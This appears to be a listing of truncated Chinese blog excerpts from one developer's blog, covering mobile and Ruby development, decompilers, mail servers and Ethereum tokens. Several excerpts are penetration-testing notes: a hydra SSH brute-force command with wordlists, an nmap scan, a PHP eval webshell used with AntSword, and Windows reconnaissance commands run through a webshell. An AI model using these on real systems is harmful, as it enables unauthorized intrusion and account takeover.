参考  http://blog.51cto.com/simeon/2066269 （貌似原作者是： http://www.freebuf.com/sectool/159488.html） hydra的使用， 需要跟字典配合。 可以参考这个字典项目：(300MB)   https://github.com/danielmiessler/SecList...

这个领域我一直没有涉足过. 之前只是在使用 qqmail, 163 mail, 不过现在这两者似乎开始不支持 自定义域名了. 一个域名邮箱一千块,没有啥技术含量(来自软件程序员的藐视... @.@ ) 所以我打算自己搭建了.  参考:  https://www.howtoforge.com/tutorial/perfect-server-ubuntu-18-04-ngin...

测试邮件的账户：VRFY， EXPN、 洋葱路由器 ， 取得隐身效果 谷歌街景， 地图， WEB摄像头 使用应用社交网络获得信息 利用google进行黑客活动：  cache: 显示缓存版本 link: 列出所有包含某访问XX的链接的页面 info： 列出页面的相关信息 使用 archive.org 可以找到不复存在的网站。  渗透测试的几个步骤： 踩点（找到信息），枚举...

1. 下载iso. 官网： kali.org    下载地址： https://www.kali.org/downloads/ 2. 找到一个iso就可以了。 我下载的是 windows 64.   kali linux 64 . 其他的有很多的发行版。 我就下载了没用任何后缀的。  下面使用 vmware来安装 3. 安装vmwa...

参考：  https://steemit.com/ethereum/@maxnachamkin/how-to-create-your-own-ethereum-token-in-an-hour-erc20-verified **** 1. 发固定数量的币：  务必务必看这个, 看这个就够了 ***   最新版看这里： （我自己整理的文档） ...

## 授权的原理: 对于WEB页面来说, 需要 "用户名" +　＂密码＂ 对于API来说，　就是需要　＂公钥＂　＋ "私钥"   (  关键在这里) 用户名 = 公钥 , 密码 = 私钥 至于把 用户名( 例如 [email protected]) 换成 公钥(例如 a1b2c3d4 ) 的原因,可能就是不希望被人网络抓包的时候,知道 当前的连接,对应的是哪个...

nmap -sS 192.168.0.1 -A hydra -l root -P pass_file ssh:192.168.0.22:22            pass_file 格式：  每行一个字符串，换行表示新的 可以来这里下载：https://github.com/danielmiessler/SecLists...

refer to:  https://liuzhichao.com/2016/jadx-decompiler.html 出于学习目的,或者研究目的,我们有时候要反编译安卓的apk.   具体的步骤我还没有试过. 大家看看上面的这个链接吧. 

之前写过  ckeditor 会默认吃掉inline style (http://siwei.me/blog/posts/ckeditor-inline-style-preserve-inline-style-in-ckeditor) 其实, ckeditor, 还会吃掉:  <script> ,  <style>,  以及...

jd-gui ( https://github.com/java-decompiler/jd-gui) 是反编译java代码最好的工具（据说） 但是在我的UBUNTU14.04 上跑不起来， 原因是 默认下载的文件是 32位的。而UBUNTU14是64位的。 试了所有google的方法都不行， 于是 下载源代码， 编译， 运行。 OK 了。 </p> this worked fo...

refer to:  http://docs.appcelerator.com/titanium/latest/#!/guide/Working_with_a_SQLite_Database and:  http://docs.appcelerator.com/titanium/latest/#!/api/Titanium.Database.ResultSet 这里的...

refer to:  http://docs.appcelerator.com/titanium/latest/#!/guide/Alloy_Sync_Adapters_and_Migrations 跟　web 开发不同，　mobile开发我们无法console中直接操作  手机的数据库．　 这点最烦，仿佛被蒙着眼睛编程．　无法直接观察到黑盒子里的内容．　只能通过其他的...

注意：　看明白这篇文章的基础，是需要知道Titanium中基本的数据库操作．　见：  http://docs.appcelerator.com/titanium/latest/#!/guide/Working_with_a_SQLite_Database-section-29004901_WorkingwithaSQLiteDatabase-CreatingandInstallin...

refer to: https://stackoverflow.com/questions/3167240/asp-net-file-upload 1. 需要一个html入口：asp_net_upload_demo.html <h3>ASPX file upload demo</h3> <iframe height="40" width="700" src=...

refer to: 官方文档 https://www.yuque.com/antswordproject/antsword/iunkur 1. 打开， 2. 添加数据中，假设服务器端的webshell内容中包含了： <?php @eval($_POST['secret']); ?> 就可以。 前后有多少无关的HTML都没问题。 3. 点击测试连接， 没问题的话点击保存。 ...

refer to:  http://docs.appcelerator.com/titanium/latest/#!/guide/Alloy_Collection_and_Model_Objects Alloy 中包含了 backbone框架. 用的是0.9.2的版本.   Model: 是app的核心. 因为我们需要展示数据. model就是数据.  bac...

refer to: https://zhuanlan.zhihu.com/p/394060852 下面是通过webshell 运行的命令，搜集系统信息： systeminfo net user: netstat -ano wmic os wmic qfe wmic product whoami wmic service list brief 列出service ...

refer to:  http://phantomjs.org/build.html and http://stackoverflow.com/questions/8778513/how-can-i-setup-run-phantomjs-on-ubuntu phantomjs 是 nodejs 下实现 webkit 的组件. (可以认为它实现了native的模拟各大浏览器) ...

有感而发 工作这么多年，只有在最初的日子里对这两个概念很有激情。 之后却没在任何一个正式项目中使用到过。 i18n:  国际化。 可以允许我们一次性的写好 文字，就可以根据不同的语言支持来切换需要显示的语言。 可惜的是，有下面几个特点： 1. 不同的语言体系根本没法通用。比如：  对于英文的 "posted at 2015 by siwei" 和 中国的 “siwei 发...

refer to:  http://snippets.aktagon.com/snippets/257-how-to-use-activerecord-without-rails app.rb: require 'active_record' require 'sqlite3' require 'logger' ActiveRecord::Base.logger = Logg...